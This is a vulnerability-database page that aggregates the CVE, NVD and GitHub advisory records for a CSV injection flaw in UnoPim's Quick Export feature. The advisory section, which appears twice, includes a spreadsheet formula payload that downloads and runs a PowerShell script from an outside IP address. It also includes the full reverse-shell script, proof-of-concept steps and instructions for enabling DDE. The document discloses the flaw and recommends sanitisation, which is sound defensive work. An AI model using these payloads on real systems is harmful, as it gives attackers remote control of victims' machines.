cvelistv5 - cve-2025-55745

CVE-2025-55745 (GCVE-0-2025-55745)

Vulnerability from cvelistv5

Published

2025-08-22 16:14

Modified

2025-08-22 20:03

Severity ?

2.5 (Low) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P

CWE

CWE-1236 - Improper Neutralization of Formula Elements in a CSV File

Summary

UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Versions 0.3.0 and prior are vulnerable to CSV injection, also known as formula injection, in the Quick Export feature. This vulnerability allows attackers to inject malicious content into exported CSV files. When the CSV file is opened in spreadsheet applications such as Microsoft Excel, the malicious input may be interpreted as a formula or command, potentially resulting in the execution of arbitrary code on the victim's device. Successful exploitation can lead to remote code execution, including the establishment of a reverse shell. Users are advised to upgrade to version 0.3.1 or later.

References

▼	URL	Tags
	security-advisories@github.com	https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34
	security-advisories@github.com	https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx

Impacted products

	Vendor	Product	Version
	unopim	unopim	Version: < 0.3.1

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-55745",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-08-22T20:02:44.930160Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-08-22T20:03:01.826Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "unopim",
          "vendor": "unopim",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.3.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Versions 0.3.0 and prior are vulnerable to CSV injection, also known as formula injection, in the Quick Export feature. This vulnerability allows attackers to inject malicious content into exported CSV files. When the CSV file is opened in spreadsheet applications such as Microsoft Excel, the malicious input may be interpreted as a formula or command, potentially resulting in the execution of arbitrary code on the victim\u0027s device. Successful exploitation can lead to remote code execution, including the establishment of a reverse shell. Users are advised to upgrade to version 0.3.1 or later."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "PRESENT",
            "attackVector": "NETWORK",
            "baseScore": 2.5,
            "baseSeverity": "LOW",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "PASSIVE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-1236",
              "description": "CWE-1236: Improper Neutralization of Formula Elements in a CSV File",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-08-22T16:14:33.134Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx"
        },
        {
          "name": "https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34"
        }
      ],
      "source": {
        "advisory": "GHSA-74rg-6f92-g6wx",
        "discovery": "UNKNOWN"
      },
      "title": "UnoPim Quick Export feature is vulnerable to CSV injection"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-55745",
    "datePublished": "2025-08-22T16:14:33.134Z",
    "dateReserved": "2025-08-14T22:31:17.685Z",
    "dateUpdated": "2025-08-22T20:03:01.826Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-55745\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-22T17:15:35.647\",\"lastModified\":\"2025-08-22T18:08:51.663\",\"vulnStatus\":\"Undergoing Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Versions 0.3.0 and prior are vulnerable to CSV injection, also known as formula injection, in the Quick Export feature. This vulnerability allows attackers to inject malicious content into exported CSV files. When the CSV file is opened in spreadsheet applications such as Microsoft Excel, the malicious input may be interpreted as a formula or command, potentially resulting in the execution of arbitrary code on the victim\u0027s device. Successful exploitation can lead to remote code execution, including the establishment of a reverse shell. Users are advised to upgrade to version 0.3.1 or later.\"},{\"lang\":\"es\",\"value\":\"UnoPim es un sistema de gesti\u00f3n de informaci\u00f3n de productos (PIM) de c\u00f3digo abierto basado en el framework Laravel. Las versiones 0.3.0 y anteriores son vulnerables a la inyecci\u00f3n de CSV, tambi\u00e9n conocida como inyecci\u00f3n de f\u00f3rmulas, en la funci\u00f3n de exportaci\u00f3n r\u00e1pida. Esta vulnerabilidad permite a los atacantes inyectar contenido malicioso en archivos CSV exportados. Al abrir el archivo CSV en aplicaciones de hoja de c\u00e1lculo como Microsoft Excel, la entrada maliciosa puede interpretarse como una f\u00f3rmula o un comando, lo que podr\u00eda provocar la ejecuci\u00f3n de c\u00f3digo arbitrario en el dispositivo de la v\u00edctima. Una explotaci\u00f3n exitosa puede provocar la ejecuci\u00f3n remota de c\u00f3digo, incluyendo el establecimiento de un shell inverso. Se recomienda a los usuarios actualizar a la versi\u00f3n 0.3.1 o posterior.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":2.5,\"baseSeverity\":\"LOW\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"PRESENT\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"PASSIVE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-1236\"}]}],\"references\":[{\"url\":\"https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx\",\"source\":\"security-advisories@github.com\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-55745\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-08-22T20:02:44.930160Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-08-22T20:02:52.410Z\"}}], \"cna\": {\"title\": \"UnoPim Quick Export feature is vulnerable to CSV injection\", \"source\": {\"advisory\": \"GHSA-74rg-6f92-g6wx\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 2.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"LOW\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P\", \"userInteraction\": \"PASSIVE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"PRESENT\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"unopim\", \"product\": \"unopim\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 0.3.1\"}]}], \"references\": [{\"url\": \"https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx\", \"name\": \"https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34\", \"name\": \"https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Versions 0.3.0 and prior are vulnerable to CSV injection, also known as formula injection, in the Quick Export feature. This vulnerability allows attackers to inject malicious content into exported CSV files. When the CSV file is opened in spreadsheet applications such as Microsoft Excel, the malicious input may be interpreted as a formula or command, potentially resulting in the execution of arbitrary code on the victim\u0027s device. Successful exploitation can lead to remote code execution, including the establishment of a reverse shell. Users are advised to upgrade to version 0.3.1 or later.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1236\", \"description\": \"CWE-1236: Improper Neutralization of Formula Elements in a CSV File\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2025-08-22T16:14:33.134Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-55745\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-08-22T20:03:01.826Z\", \"dateReserved\": \"2025-08-14T22:31:17.685Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2025-08-22T16:14:33.134Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

fkie_cve-2025-55745

Vulnerability from fkie_nvd

Published

2025-08-22 17:15

Modified

2025-08-25 17:35

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Summary

References

▼	URL	Tags
	security-advisories@github.com	https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34	Patch
	security-advisories@github.com	https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	webkul	unopim	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:webkul:unopim:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8AE1E6BA-5691-4E33-B77B-8548506CEE50",
              "versionEndExcluding": "0.3.1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "UnoPim is an open-source Product Information Management (PIM) system built on the Laravel framework. Versions 0.3.0 and prior are vulnerable to CSV injection, also known as formula injection, in the Quick Export feature. This vulnerability allows attackers to inject malicious content into exported CSV files. When the CSV file is opened in spreadsheet applications such as Microsoft Excel, the malicious input may be interpreted as a formula or command, potentially resulting in the execution of arbitrary code on the victim\u0027s device. Successful exploitation can lead to remote code execution, including the establishment of a reverse shell. Users are advised to upgrade to version 0.3.1 or later."
    },
    {
      "lang": "es",
      "value": "UnoPim es un sistema de gesti\u00f3n de informaci\u00f3n de productos (PIM) de c\u00f3digo abierto basado en el framework Laravel. Las versiones 0.3.0 y anteriores son vulnerables a la inyecci\u00f3n de CSV, tambi\u00e9n conocida como inyecci\u00f3n de f\u00f3rmulas, en la funci\u00f3n de exportaci\u00f3n r\u00e1pida. Esta vulnerabilidad permite a los atacantes inyectar contenido malicioso en archivos CSV exportados. Al abrir el archivo CSV en aplicaciones de hoja de c\u00e1lculo como Microsoft Excel, la entrada maliciosa puede interpretarse como una f\u00f3rmula o un comando, lo que podr\u00eda provocar la ejecuci\u00f3n de c\u00f3digo arbitrario en el dispositivo de la v\u00edctima. Una explotaci\u00f3n exitosa puede provocar la ejecuci\u00f3n remota de c\u00f3digo, incluyendo el establecimiento de un shell inverso. Se recomienda a los usuarios actualizar a la versi\u00f3n 0.3.1 o posterior."
    }
  ],
  "id": "CVE-2025-55745",
  "lastModified": "2025-08-25T17:35:21.020",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "PRESENT",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 2.5,
          "baseSeverity": "LOW",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "PROOF_OF_CONCEPT",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "LOW",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "HIGH",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "PASSIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-08-22T17:15:35.647",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-1236"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

ghsa-74rg-6f92-g6wx

Vulnerability from github

Published

2025-08-22 16:50

Modified

2025-08-22 21:09

Severity ?

2.5 (Low) - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P

Summary

UnoPim has CSV Injection on Quick Export feature

Details

Summary

Description: CSV Injection or Formula Injection is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.

Details

A basic test for CSV Injection is using SUM() to add two numbers or open calc.exe using command: =cmd|' /C calc'!A0

The same method can be used to run arbitrary code on the victim's machine. For example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker's machine. Payload:

This is our payload and will be used in the vulnerable field during exploitation =cmd|' /C powershell Invoke-WebRequest "http://52.172.182.242:7000/shell.ps1" -OutFile "$env:Temp\shell.ps1"; powershell -ExecutionPolicy Bypass -File "$env:Temp\shell.ps1"'!A1

shell.ps1: $client = New-Object System.Net.Sockets.TCPClient('52.172.182.242',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

PoC:

Go to any product and click on Edit
Add the above discussed payload in any field that accept text for e.g. Product Number field.
Quick Export -> Select CSV, Open the csv, the formula will get executed during opening.

This could be injected by admin or any user that has privilege to edit products. Also the CSRF Injection reported at product edit feature can be used as an attack vector to add such payloads.

Please note that if this is replicated on version starting from Office 2021: Follow these steps: Go to File > Options > Trust Center > Trust Center Settings > External Content -> Enable Dynamic Data Exchange Server Launch". This is due to Office 2021 and Microsoft 365 have DDE disabled by default for enhanced security.

Platform Details: Replicated this on Office 2021 on Windows 11. POC video link: https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3

Impact

When the victim opens the CSV, the injected formula which fetches a reverse shell script written in Powershell from attacker's server and executes it. This creates a reverse shell connection from victim's device to attacker's allowing an attacker to perform any action on the victim's device.

Recommendation:

Avoid starting values with Equals sign (=), Plus sign (+), Minus sign (-), At symbol (@), Tab (0x09), Carriage return (0x0D).
Sanitize the vulnerable field using regex or standard libraries.
Wrap the value around double quotes for fields that cannot be sanitized for some reason so that the value is considered as string instead of formula.

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.3.0"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "unopim/unopim"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.3.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-55745"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1236"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-22T16:50:05Z",
    "nvd_published_at": "2025-08-22T17:15:35Z",
    "severity": "LOW"
  },
  "details": "### Summary\nDescription:\n`CSV Injection` or `Formula Injection` is a security vulnerability that occurs when malicious content is inserted into a CSV (Comma-Separated Values) file, which is then opened in a spreadsheet application like Microsoft Excel. This attack exploits the way spreadsheet software automatically interprets certain text patterns as formulas or commands, rather than plain text.\n\n### Details\nA basic test for CSV Injection is using `SUM()` to add two numbers or open calc.exe\u200b using\u200b\ncommand:\n `=cmd|\u0027 /C calc\u0027!A0\u200b`\n\n\nThe same method can be used to run arbitrary code on the victim\u0027s machine.\nFor example the below code will download and execute a malicious script to create a reverse TCP connection to the attacker\u0027s machine.\n*Payload*:\n\u003e This is our payload and will be used in the vulnerable field during exploitation\n```\n    =cmd|\u0027 /C powershell Invoke-WebRequest\n    \"http://52.172.182.242:7000/shell.ps1\" -OutFile \"$env:Temp\\shell.ps1\";\n    powershell -ExecutionPolicy Bypass -File \"$env:Temp\\shell.ps1\"\u0027!A1\u200b\n```\n\n*shell.ps1*:\n```\n    $client = New-Object System.Net.Sockets.TCPClient(\u002752.172.182.242\u0027,8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex \". { $data } 2\u003e\u00261\" | Out-String ); $sendback2 = $sendback + \u0027PS \u0027 + (pwd).Path + \u0027\u003e \u0027;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\u200b\n```\n\n### PoC:\n\n  1. Go to any product and click on Edit\n  2. Add the above discussed payload in any field that accept text for e.g. Product Number field.\n  3. Quick Export -\u003e Select CSV, Open the csv, the formula will get executed during opening.\n\n\u003e This could be injected by admin or any user that has privilege to edit products.\n\u003e Also the CSRF Injection reported at product edit feature can be used as an attack vector to add such payloads.\n\n\nPlease note that if this is replicated on version starting from Office 2021:\nFollow these steps:\nGo to `File \u003e Options \u003e Trust Center \u003e Trust Center Settings \u003e External Content\u200b -\u003e Enable Dynamic Data Exchange Server Launch\"`.\nThis is due to Office 2021 and Microsoft 365 have DDE disabled by default for enhanced security.\n\nPlatform Details:\nReplicated this on Office 2021 on Windows 11.\nPOC video link: https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3\n\n### Impact\nWhen the victim opens the CSV, the injected formula which fetches a reverse shell script written in Powershell from attacker\u0027s server and executes it. This creates a reverse shell connection from victim\u0027s device to attacker\u0027s allowing an attacker to perform any action on the victim\u0027s device.\n\n### Recommendation:\n- Avoid starting values with Equals sign (=), Plus sign (+), Minus sign (-), At symbol (@), Tab (0x09), Carriage return (0x0D).\n- Sanitize the vulnerable field using regex or standard libraries.\n- Wrap the value around double quotes for fields that cannot be sanitized for some reason so that the value is considered as string instead of formula.",
  "id": "GHSA-74rg-6f92-g6wx",
  "modified": "2025-08-22T21:09:43Z",
  "published": "2025-08-22T16:50:05Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/security/advisories/GHSA-74rg-6f92-g6wx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55745"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/commit/8325b78567411ad78d44c0385f192360e608ff71"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unopim/unopim/commit/b25db9496fc147842a519d1dd42ec03c3bf00a34"
    },
    {
      "type": "WEB",
      "url": "https://drive.proton.me/urls/3TP1QEMXNC#2PAy7OkVqdP3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/unopim/unopim"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "UnoPim has CSV Injection on Quick Export feature"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2025-55745 (GCVE-0-2025-55745)

Vulnerability from cvelistv5

fkie_cve-2025-55745

Vulnerability from fkie_nvd

ghsa-74rg-6f92-g6wx

Vulnerability from github

Summary

Details

PoC:

Impact

Recommendation:

Tags

Sightings

Nomenclature